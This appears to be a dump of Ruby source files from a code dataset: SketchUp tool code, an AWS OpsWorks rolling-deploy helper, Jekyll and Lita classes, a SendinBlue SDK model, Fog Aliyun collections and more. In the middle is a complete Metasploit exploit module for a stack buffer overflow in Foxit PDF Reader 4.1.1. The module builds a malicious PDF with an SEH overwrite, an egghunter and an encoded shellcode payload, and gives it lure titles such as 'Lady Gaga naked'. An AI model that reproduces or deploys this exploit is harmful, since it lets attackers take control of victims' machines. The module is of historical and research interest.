# @param force_ui_update [Boolean]
def apply_mode(mode, view = Sketchup.active_model.active_view, force_ui_update: false)
if !mode.nil? && mode != @mode
@mode.deactivate_mode self, mode, view unless @mode.nil?
mode.activate_mode self, @mode, view
@mode = mode
self.apply_mode @mode.on_resume(self, view), view, force_ui_update: force_ui_update
if mode == Mode::END_OF_OPERATION
Sketchup.status_text = nil
Sketchup.vcb_label = nil
Sketchup.vcb_value = nil
Sketchup.active_model.select_tool nil
return
end
end
self.update_ui force_ui_update
end
def update_ui(force = false)
new_vcb = @mode.vcb
if force || new_vcb != self.vcb_mode
self.vcb_mode = new_vcb
Sketchup.vcb_label = new_vcb[1]
Sketchup.vcb_value = new_vcb[2]
end
new_status = [@mode.status, @mode.chordset.status].reject(&:nil?).reject(&:empty?).join(' ||| ')
if force || new_status != @status_text
@status_text = new_status
Sketchup.status_text = new_status
end
end
def drag_rect_to_pts3d
r = self.drag_rect
x_min = r.upper_left.x
y_min = r.upper_left.y
x_max = r.lower_right.x
y_max = r.lower_right.y
[
Geom::Point3d.new(x_min, y_min),
Geom::Point3d.new(x_max, y_min),
Geom::Point3d.new(x_max, y_max),
Geom::Point3d.new(x_min, y_max),
]
end
end # class Tool
end # module ToolStateMachine
end # module Crafty
| 31.746835 | 110 | 0.602472 |
114d1e7a379cb5fc3f0278af6c1b4aeab161aaa6 | 479 | xml.instruct!
xml.feed "xmlns" => "http://www.w3.org/2005/Atom", "xmlns:media" => "http://search.yahoo.com/mrss/" do
xml.title "#{@user.name} activity"
xml.link href: user_url(@user, :atom), rel: "self", type: "application/atom+xml"
xml.link href: user_url(@user), rel: "alternate", type: "text/html"
xml.id user_url(@user)
xml.updated @events.latest_update_time.xmlschema if @events.any?
@events.each do |event|
event_to_atom(xml, event)
end
end
| 36.846154 | 102 | 0.665971 |
2871afff3786819f31484e9615b75fc0c8039e5f | 468 | module Locomotive
module Steam
class EditableElementService
include Locomotive::Steam::Services::Concerns::Decorator
attr_accessor_initialize :repository, :locale
def find(page, block, slug)
decorate(Decorators::I18nDecorator) do
repository.editable_element_for(page, block, slug).tap do |element|
element.base_url = repository.base_url(page) if element
end
end
end
end
end
end
| 21.272727 | 77 | 0.668803 |
ff28039bafb8df5b241349e50574be56eccca676 | 391 | # frozen_string_literal: true
module Jekyll
module Drops
class CollectionDrop < Drop
extend Forwardable
mutable false
def_delegator :@obj, :write?, :output
def_delegators :@obj, :label, :docs, :files, :directory, :relative_directory
private def_delegator :@obj, :metadata, :fallback_data
def to_s
docs.to_s
end
end
end
end
| 18.619048 | 82 | 0.654731 |
87557d67bbdc308b5146f00c5828f9f540c434dd | 11,591 | require 'aws-sdk'
require 'timeout'
class OpsworksInteractor
begin
require 'redis-semaphore'
rescue LoadError
# suppress, this is handled at runtime in with_deploy_lock
end
DeployLockError = Class.new(StandardError)
# All opsworks endpoints are in the us-east-1 region, see:
# http://docs.aws.amazon.com/opsworks/latest/userguide/cli-examples.html
OPSWORKS_REGION = 'us-east-1'
def initialize(access_key_id, secret_access_key, redis: nil)
# All opsworks endpoints are always in the OPSWORKS_REGION
@opsworks_client = Aws::OpsWorks::Client.new(
access_key_id: access_key_id,
secret_access_key: secret_access_key,
region: OPSWORKS_REGION
)
@elb_client = Aws::ElasticLoadBalancing::Client.new(
access_key_id: access_key_id,
secret_access_key: secret_access_key,
region: ENV['AWS_REGION'] || OPSWORKS_REGION
)
# Redis host and port may be supplied if you want to run your deploys with
# mutual exclusive locking (recommended)
# Example redis config: { host: 'foo', port: 42 }
@redis = redis
end
# Runs only ONE rolling deploy at a time.
#
# If another one is currently running, waits for it to finish before starting
def rolling_deploy(**kwargs)
with_deploy_lock do
rolling_deploy_without_lock(**kwargs)
end
end
# Deploys the given app_id on the given instance_id in the given stack_id
#
# Blocks until AWS confirms that the deploy was successful
#
# Returns a Aws::OpsWorks::Types::CreateDeploymentResult
def deploy(stack_id:, app_id:, instance_id:, deploy_timeout: 30.minutes)
response = @opsworks_client.create_deployment(
stack_id: stack_id,
app_id: app_id,
instance_ids: [instance_id],
command: {
name: 'deploy',
args: {
'migrate' => ['true'],
}
}
)
log("Deploy process running (id: #{response[:deployment_id]})...")
wait_until_deploy_completion(response[:deployment_id], deploy_timeout)
log("✓ deploy completed")
response
end
private
# Polls Opsworks for timeout seconds until deployment_id has completed
def wait_until_deploy_completion(deployment_id, timeout)
started_at = Time.now
Timeout::timeout(timeout) do
@opsworks_client.wait_until(
:deployment_successful,
deployment_ids: [deployment_id]
) do |w|
# disable max attempts
w.max_attempts = nil
end
end
end
# Loop through all instances in layer
# Deregister from ELB (elastic load balancer)
# Wait connection draining timeout (default up to maximum of 300s)
# Initiate deploy and run migrations
# Register instance back to ELB
# Wait for AWS to confirm the instance as registered and healthy
# Once complete, move onto the next instance and repeat
def rolling_deploy_without_lock(stack_id:, layer_id:, app_id:)
log("Starting opsworks deploy for app #{app_id}\n\n")
instances = @opsworks_client.describe_instances(layer_id: layer_id)[:instances]
instances.each do |instance|
# Only deploy to online instances
next unless instance.status == 'online'
begin
log("=== Starting deploy for #{instance.hostname} ===")
load_balancers = detach_from_elbs(instance: instance)
deploy(
stack_id: stack_id,
app_id: app_id,
instance_id: instance.instance_id
)
ensure
attach_to_elbs(instance: instance, load_balancers: load_balancers) if load_balancers
log("=== Done deploying on #{instance.hostname} ===\n\n")
end
end
log("SUCCESS: completed opsworks deploy for all instances on app #{app_id}")
end
# Executes the given block only after obtaining an exclusive lock on the
# deploy semaphore.
#
# EXPLANATION
# ===========
#
# If two or more rolling deploys were to execute simultanously, there is a
# possibility that all instances could be detached from the load balancer
# at the same time.
#
# Although we check that other instances are attached before detaching, there
# could be a case where a deploy was running simultaneously on each instance
# of a pair. A race would then be possible where each machine sees the
# presence of the other instance and then both are detached. Now the load
# balancer has no instances to send traffic to
#
# Result: downtime and disaster.
#
# By executing the code within the context of a lock on a shared global deploy
# mutex, deploys are forced to run in serial, and only one machine is detached
# at a time.
#
# Result: disaster averted.
DEPLOY_WAIT_TIMEOUT = 600 # max seconds to wait in the queue, once this has expired the process will raise
def with_deploy_lock
if !defined?(Redis::Semaphore)
log(<<-MSG.squish)
Redis::Semaphore not found, will attempt to deploy without locking.\n
WARNING: this could cause undefined behavior if two or more deploys
are run simultanously!\n
It is recommended that you use semaphore locking. To fix this, add
`gem 'redis-semaphore'` to your Gemfile and run `bundle install`.
MSG
yield
elsif !@redis
log(<<-MSG.squish)
Redis::Semaphore was found but :redis was not set, will attempt to
deploy without locking.\n
WARNING: this could cause undefined behavior if two or more deploys
are run simultanously!\n
It is recommended that you use semaphore locking. To fix this, supply a
:redis hash like { host: 'foo', port: 42 } .
MSG
yield
else
s = Redis::Semaphore.new(:deploy, **@redis)
log("Waiting for deploy lock...")
success = s.lock(DEPLOY_WAIT_TIMEOUT) do
log("Got lock. Running deploy...")
yield
log("Deploy complete. Releasing lock...")
true
end
if success
log("Lock released")
true
else
fail(DeployLockError, "could not get deploy lock within #{DEPLOY_WAIT_TIMEOUT} seconds")
end
end
end
# Takes a Aws::OpsWorks::Types::Instance
#
# Detaches the provided instance from all of its load balancers
#
# Returns the detached load balancers as an array of
# Aws::ElasticLoadBalancing::Types::LoadBalancerDescription
#
# Blocks until AWS confirms that all instances successfully detached before
# returning
#
# Does not wait and instead returns an empty array if no load balancers were
# found for this instance
def detach_from_elbs(instance:)
unless instance.is_a?(Aws::OpsWorks::Types::Instance)
fail(ArgumentError, "instance must be a Aws::OpsWorks::Types::Instance struct")
end
all_load_balancers = @elb_client.describe_load_balancers
.load_balancer_descriptions
load_balancers = detach_from(all_load_balancers, instance)
lb_wait_params = []
load_balancers.each do |lb|
params = {
load_balancer_name: lb.load_balancer_name,
instances: [{ instance_id: instance.ec2_instance_id }]
}
remaining_instances = @elb_client
.deregister_instances_from_load_balancer(params)
.instances
log(<<-MSG.squish)
Will detach instance #{instance.ec2_instance_id} from
#{lb.load_balancer_name} (remaining attached instances:
#{remaining_instances.map(&:instance_id).join(', ')})
MSG
lb_wait_params << params
end
if lb_wait_params.any?
lb_wait_params.each do |params|
# wait for all load balancers to list the instance as deregistered
@elb_client.wait_until(:instance_deregistered, params)
log("✓ detached from #{params[:load_balancer_name]}")
end
else
log("No load balancers found for instance #{instance.ec2_instance_id}")
end
load_balancers
end
# Accepts load_balancers as array of
# Aws::ElasticLoadBalancing::Types::LoadBalancerDescription
# and instances as a Aws::OpsWorks::Types::Instance
#
# Returns only the LoadBalancerDescription objects that have the instance
# attached and should be detached from
#
# Will not include a load balancer in the returned collection if the
# supplied instance is the ONLY one connected. Detaching the sole remaining
# instance from a load balancer would probably cause undesired results.
def detach_from(load_balancers, instance)
check_arguments(instance: instance, load_balancers: load_balancers)
load_balancers.select do |lb|
matched_instance = lb.instances.any? do |lb_instance|
instance.ec2_instance_id == lb_instance.instance_id
end
if matched_instance && lb.instances.count > 1
# We can detach this instance safely because there is at least one other
# instance to handle traffic
true
elsif matched_instance && lb.instances.count == 1
# We can't detach this instance because it's the only one
log(<<-MSG.squish)
Will not detach #{instance.ec2_instance_id} from load balancer
#{lb.load_balancer_name} because it is the only instance connected
MSG
false
else
# This load balancer isn't attached to this instance
false
end
end
end
# Takes an instance as a Aws::OpsWorks::Types::Instance
# and load balancers as an array of
# Aws::ElasticLoadBalancing::Types::LoadBalancerDescription
#
# Attaches the provided instance to the supplied load balancers and blocks
# until AWS confirms that the instance is attached to all load balancers
# before returning
#
# Does nothing and instead returns an empty hash if load_balancers is empty
#
# Otherwise returns a hash of load balancer names each with a
# Aws::ElasticLoadBalancing::Types::RegisterEndPointsOutput
def attach_to_elbs(instance:, load_balancers:)
check_arguments(instance: instance, load_balancers: load_balancers)
if load_balancers.empty?
log("No load balancers to attach to")
return {}
end
lb_wait_params = []
registered_instances = {} # return this
load_balancers.each do |lb|
params = {
load_balancer_name: lb.load_balancer_name,
instances: [{ instance_id: instance.ec2_instance_id }]
}
result = @elb_client.register_instances_with_load_balancer(params)
registered_instances[lb.load_balancer_name] = result
lb_wait_params << params
end
log("Re-attaching instance #{instance.ec2_instance_id} to all load balancers")
# Wait for all load balancers to list the instance as registered
lb_wait_params.each do |params|
@elb_client.wait_until(:instance_in_service, params)
log("✓ re-attached to #{params[:load_balancer_name]}")
end
registered_instances
end
# Fails unless arguments are of the expected types
def check_arguments(instance:, load_balancers:)
unless instance.is_a?(Aws::OpsWorks::Types::Instance)
fail(ArgumentError,
":instance must be a Aws::OpsWorks::Types::Instance struct")
end
unless load_balancers.respond_to?(:each) &&
load_balancers.all? do |lb|
lb.is_a?(Aws::ElasticLoadBalancing::Types::LoadBalancerDescription)
end
fail(ArgumentError, <<-MSG.squish)
:load_balancers must be a collection of
Aws::ElasticLoadBalancing::Types::LoadBalancerDescription objects
MSG
end
end
# Could use Rails logger here instead if you wanted to
def log(message)
puts message
end
end
| 32.742938 | 108 | 0.686912 |
e99625add9d790cc1db80e51782f9ad068385882 | 982 | module Lita
# Constructs a Lita plugin from a block.
# @since 4.0.0
# @api private
class PluginBuilder
# @param namespace [String, Symbol] The Redis namespace to use for the plugin.
# @yield The class body of the plugin.
def initialize(namespace, &block)
@namespace = namespace.to_s
@block = block
end
# Constructs an {Lita::Adapter} from the provided block.
# @return [Lita::Adapter]
def build_adapter
adapter = create_plugin(Adapter)
adapter.class_exec(&@block)
adapter
end
# Constructs a {Lita::Handler} from the provided block.
# @return [Lita::Handler]
def build_handler
handler = create_plugin(Handler)
handler.class_exec(&@block)
handler
end
private
# Creates a class of the relevant plugin type and sets its namespace.
def create_plugin(plugin_type)
plugin = Class.new(plugin_type)
plugin.namespace(@namespace)
plugin
end
end
end
| 25.179487 | 82 | 0.660896 |
e905b7da556e76adce4f9ae378680a012475810e | 4,844 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Egghunter
#include Msf::Exploit::Seh # unused due to special circumstances
def initialize(info = {})
super(update_info(info,
'Name' => 'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Foxit PDF Reader prior to version
4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that
contains an overly long string in the Title field. This results in overwriting a
structured exception handler record.
NOTE: This exploit does not use javascript.
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'dookie', # Discovered the bug
'Sud0', # Original exploit (from Offsec Exploit Weekend)
'corelanc0d3r <peter.ve[at]corelan.be>', # Metasploit exploit
'jduck' # Metasploit-fu
],
'References' =>
[
#[ 'CVE', '' ],
[ 'OSVDB', '68648' ],
[ 'EDB', '15532' ],
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/' ]
],
'Payload' =>
{
'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EDI', # egghunter jmp edi
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Foxit Reader v4.1.1 XP Universal', { 'Offset' => 540, 'Ret' => "\x4B\x6A" } ] #unicode p/p/r foxit reader.exe
],
'DisclosureDate' => 'Nov 13 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The output filename.', 'corelan_foxit.pdf'])
], self.class)
end
def exploit
@label = rand_text_alpha(7)
nseh = "\x5A\x41" # pop edx -- to make edx writable
seh = target['Ret']
# inc ecx / pop esp / popad / push esp / ret
align = "\x41\x61\x5C\x5C\x41\x61\x41\x54\x41\xC3"
ecx_control = "\xB3\x30\xB3" # becomes ecx
hunter, @egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
# Encode with alphamixed, then unicode mixed
[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
enc = framework.encoders.create(name)
if name =~ /unicode/
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
else
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
end
# NOTE: we already eliminated badchars
hunter = enc.encode(hunter, nil, nil, platform)
if name =~/alpha/
#insert getpc_stub & align EDX, unicode encoder friendly.
#Hardcoded stub is not an issue here because it gets encoded anyway
getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
hunter = getpc_stub + hunter
end
}
#tweak hunter, patched to make it write to ECX
hunter[1] = "a"
doctitles = [
"Confidential : Contract + Terms of Use",
"Contract information",
"Acquisition contract",
"...loading, please wait...",
"Trademark, patent and copyright information",
"Limited Liability Partnership",
"Partnership agreement",
"Last will and testament",
"How to hack gmail",
"Running Metasploit on Windows Mobile",
"Free torrent sites",
"Lady Gaga naked",
"Free Shopping vouchers"
]
sploit = ''
sploit << doctitles[rand(doctitles.length)]
sploit << " " * (target['Offset'] - sploit.length)
sploit << nseh << seh
sploit << align
sploit << ecx_control
sploit << hunter
file_create(make_pdf(sploit))
end
# Override the mixin obfuscator since it doesn't seem to work here.
def nObfu(str)
return str
end
def trailer(root_obj)
ret = 'trailer'
ret << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj)
ret << nObfu("/Info ") << ioRef(5)
ret << nObfu("/#{@label} #{@egg}")
ret << nObfu(">>")
ret << eol
ret
end
def make_pdf(sploit)
@pdf << header('1.4')
add_object(1, nObfu("<</ViewerPreferences<</DisplayDocTitle true>>/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/Type/Catalog/Lang(en-US)>>"))
add_object(2, nObfu("<</Type/Outlines/Count 0>>"))
add_object(3, nObfu("<</Count 1/Type/Pages/Kids[") << ioRef(4) << nObfu("]>>"))
add_object(4, nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>"))
add_object(5, nObfu("<</Title (") + sploit + nObfu(")>>"))
finish_pdf
end
end
| 30.465409 | 165 | 0.638315 |
ff3e0f44921c95dcd6fe97addc21ba800a00d1c4 | 10,361 | =begin
#SendinBlue API
#SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module SibApiV3Sdk
class SendTransacSms
# Name of the sender. **The number of characters is limited to 11 for alphanumeric characters and 15 for numeric characters**
attr_accessor :sender
# Mobile number to send SMS with the country code
attr_accessor :recipient
# Content of the message. If more than 160 characters long, will be sent as multiple text messages
attr_accessor :content
# Type of the SMS. Marketing SMS messages are those sent typically with marketing content. Transactional SMS messages are sent to individuals and are triggered in response to some action, such as a sign-up, purchase, etc.
attr_accessor :type
# Tag of the message
attr_accessor :tag
# Webhook to call for each event triggered by the message (delivered etc.)
attr_accessor :web_url
# Format of the message. It indicates whether the content should be treated as unicode or not.
attr_accessor :unicode_enabled
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'sender' => :'sender',
:'recipient' => :'recipient',
:'content' => :'content',
:'type' => :'type',
:'tag' => :'tag',
:'web_url' => :'webUrl',
:'unicode_enabled' => :'unicodeEnabled'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'sender' => :'String',
:'recipient' => :'String',
:'content' => :'String',
:'type' => :'String',
:'tag' => :'String',
:'web_url' => :'String',
:'unicode_enabled' => :'BOOLEAN'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'sender')
self.sender = attributes[:'sender']
end
if attributes.has_key?(:'recipient')
self.recipient = attributes[:'recipient']
end
if attributes.has_key?(:'content')
self.content = attributes[:'content']
end
if attributes.has_key?(:'type')
self.type = attributes[:'type']
else
self.type = 'transactional'
end
if attributes.has_key?(:'tag')
self.tag = attributes[:'tag']
end
if attributes.has_key?(:'webUrl')
self.web_url = attributes[:'webUrl']
end
if attributes.has_key?(:'unicodeEnabled')
self.unicode_enabled = attributes[:'unicodeEnabled']
else
self.unicode_enabled = false
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @sender.nil?
invalid_properties.push('invalid value for "sender", sender cannot be nil.')
end
if @sender.to_s.length > 15
invalid_properties.push('invalid value for "sender", the character length must be smaller than or equal to 15.')
end
if @recipient.nil?
invalid_properties.push('invalid value for "recipient", recipient cannot be nil.')
end
if @content.nil?
invalid_properties.push('invalid value for "content", content cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @sender.nil?
return false if @sender.to_s.length > 15
return false if @recipient.nil?
return false if @content.nil?
type_validator = EnumAttributeValidator.new('String', ['transactional', 'marketing'])
return false unless type_validator.valid?(@type)
true
end
# Custom attribute writer method with validation
# @param [Object] sender Value to be assigned
def sender=(sender)
if sender.nil?
fail ArgumentError, 'sender cannot be nil'
end
if sender.to_s.length > 15
fail ArgumentError, 'invalid value for "sender", the character length must be smaller than or equal to 15.'
end
@sender = sender
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] type Object to be assigned
def type=(type)
validator = EnumAttributeValidator.new('String', ['transactional', 'marketing'])
unless validator.valid?(type)
fail ArgumentError, 'invalid value for "type", must be one of #{validator.allowable_values}.'
end
@type = type
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
sender == o.sender &&
recipient == o.recipient &&
content == o.content &&
type == o.type &&
tag == o.tag &&
web_url == o.web_url &&
unicode_enabled == o.unicode_enabled
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[sender, recipient, content, type, tag, web_url, unicode_enabled].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = SibApiV3Sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.581761 | 839 | 0.620693 |
e9dfdee642b07823f908688888654ef36824c2e2 | 576 | require 'forwardable'
module Cucumber
module Formatter
# Adapter to make #puts/#print/#flush work with win32console
class ColorIO #:nodoc:
extend Forwardable
def_delegators :@kernel, :puts, :print # win32console colours only work when sent to Kernel
def_delegators :@stdout, :flush, :tty?, :write, :close
def initialize(kernel, stdout)
@kernel = kernel
@stdout = stdout
end
# Ensure using << still gets colours in win32console
def <<(output)
print(output)
self
end
end
end
end
| 24 | 97 | 0.637153 |
bfc2c6d02b731a053433dda8548a741cd129818c | 2,994 | # frozen_string_literal: true
module CIT
module Actions
# Provides functions to access actions on records of mad scientists
module MadScientists
require_relative 'mad_scientists/create'
# Creates new record of a mad scientist and returns associative array
# with information about the record
# @param [Object] params
# object of action parameters, which can be an associative array, a
# JSON-string or an object with `#read` method
# @param [NilClass, Hash] rest
# associative array of additional action parameters or `nil`, if
# there are no additional parameters
# @return [Hash]
# resulting associative array
def self.create(params, rest = nil)
Create.new(params, rest).create
end
require_relative 'mad_scientists/destroy'
# Destroys record of a mad scientist
# @param [Object] params
# object of action parameters, which can be an associative array, a
# JSON-string or an object with `#read` method
# @param [NilClass, Hash] rest
# associative array of additional action parameters or `nil`, if
# there are no additional parameters
def self.destroy(params, rest = nil)
Destroy.new(params, rest).destroy
end
require_relative 'mad_scientists/index'
# Extracts and returns array with information on mad scientists
# @param [Object] params
# object of action parameters, which can be an associative array, a
# JSON-string or an object with `#read` method
# @param [NilClass, Hash] rest
# associative array of additional action parameters or `nil`, if
# there are no additional parameters
# @return [Array]
# resulting array
def self.index(params, rest = nil)
Index.new(params, rest).index
end
require_relative 'mad_scientists/show'
# Extracts and returns associative array with information on mad
# scientist
# @param [Object] params
# object of action parameters, which can be an associative array, a
# JSON-string or an object with `#read` method
# @param [NilClass, Hash] rest
# associative array of additional action parameters or `nil`, if
# there are no additional parameters
# @return [Hash]
# resulting associative array
def self.show(params, rest = nil)
Show.new(params, rest).show
end
require_relative 'mad_scientists/update'
# Updates information on a mad scientist
# @param [Object] params
# object of action parameters, which can be an associative array, a
# JSON-string or an object with `#read` method
# @param [NilClass, Hash] rest
# associative array of additional action parameters or `nil`, if
# there are no additional parameters
def self.update(params, rest = nil)
Update.new(params, rest).update
end
end
end
end
| 36.512195 | 75 | 0.655311 |
3989b9c90cf5b0979b14525b6a37156b4b4dca98 | 172 | require 'guard'
require 'guard/guard'
module Guard
class Autorefresh < Guard
def run_on_change(paths)
system('autorefresh my_awesome_app')
end
end
end
| 13.230769 | 42 | 0.709302 |
08924e54182b9472581a3489ae970bd725587393 | 660 | # frozen_string_literal: true
module RuboCop
module Cop
module Minitest
# This cop enforces the test to use `assert_in_delta`
# instead of using `assert_equal` to compare floats.
#
# @example
# # bad
# assert_equal(0.2, actual)
# assert_equal(0.2, actual, 'message')
#
# # good
# assert_in_delta(0.2, actual)
# assert_in_delta(0.2, actual, 0.001, 'message')
#
class AssertInDelta < Cop
include InDeltaMixin
def_node_matcher :equal_floats_call, <<~PATTERN
(send nil? :assert_equal $_ $_ $...)
PATTERN
end
end
end
end
| 23.571429 | 59 | 0.578788 |
ab716b124fbe58958b2faadc97748609af6108a5 | 932 | RSpec::Matchers.define :schedule_rake do |task|
match do |whenever|
jobs = whenever.instance_variable_get("@jobs")
key = @duration.is_a?(ActiveSupport::Duration) ? @duration.to_i : @duration
if jobs.has_key?(key)
jobs[key].any? do |job|
options = job.instance_variable_get("@options")
options[:task] == task && (@time.present? ? job.at == @time : true)
end
else
puts "as"
false
end
end
chain :every do |duration|
@duration = duration
end
chain :at do |time|
@time = time
end
failure_message do |actual|
"Expected whenever to schedule #{ task } every #{ @duration } seconds"
end
failure_message_when_negated do |actual|
"Expected whenever not to schedule #{ task } every #{ @duration } seconds"
end
end
RSpec::Matchers.alias_matcher :schedule_runner, :schedule_rake
RSpec::Matchers.alias_matcher :schedule_command, :schedule_rake
| 25.189189 | 79 | 0.666309 |
4aab371ea1367608f25bbca24c854f9f1d0ef2a7 | 861 | # Initialiazing vars
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
# calculates the number of cars not driven, assuming one car per driver
cars_driven = drivers
# calculates the number of cars driven, assumin one car per driver
carpool_capacity = cars_driven * space_in_a_car
# calculates carpool_capacity by multiplying cars_driven by space in each car
average_passengers_per_car = passengers / cars_driven
# calculates the average number of passengers by the number of driven cars
puts "There are #{cars} cars available."
puts "There are only #{drivers} drivers available."
puts "There will be #{cars_not_driven} empty cars today."
puts "We can transport #{carpool_capacity} people today."
puts "We have #{passengers} to carpool today."
puts "We need to put about #{average_passengers_per_car} in each car."
| 37.434783 | 77 | 0.785134 |
7988cc9edc7cf8e922a3962e00e09149f1aa431b | 1,198 | =begin
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AuthressSdk::Body6
# Please update as you see appropriate
describe 'Body6' do
before do
# run before each test
@instance = AuthressSdk::Body6.new
end
after do
# run after each test
end
describe 'test an instance of Body6' do
it 'should create an instance of Body6' do
expect(@instance).to be_instance_of(AuthressSdk::Body6)
end
end
describe 'test attribute "role_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "description"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "permissions"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 23.038462 | 102 | 0.696995 |
21cabeadd74e0d2f3d80f27861318e0263434875 | 764 | # frozen_string_literal: true
require 'fog/core/collection'
require 'fog/aliyun/models/compute/eip_address'
module Fog
module Compute
class Aliyun
class EipAddresses < Fog::Collection
model Fog::Compute::Aliyun::EipAddress
def all(filters_arg = {})
data = Fog::JSON.decode(service.list_eip_addresses(filters_arg).body)['EipAddresses']['EipAddress']
load(data)
# load(data['volumeSet'])
# if server
# self.replace(self.select {|volume| volume.server_id == server.id})
# end
# self
end
def get(allocation_id)
self.class.new(service: service).all(allocation_id: allocation_id)[0] if allocation_id
end
end
end
end
end
| 26.344828 | 109 | 0.624346 |
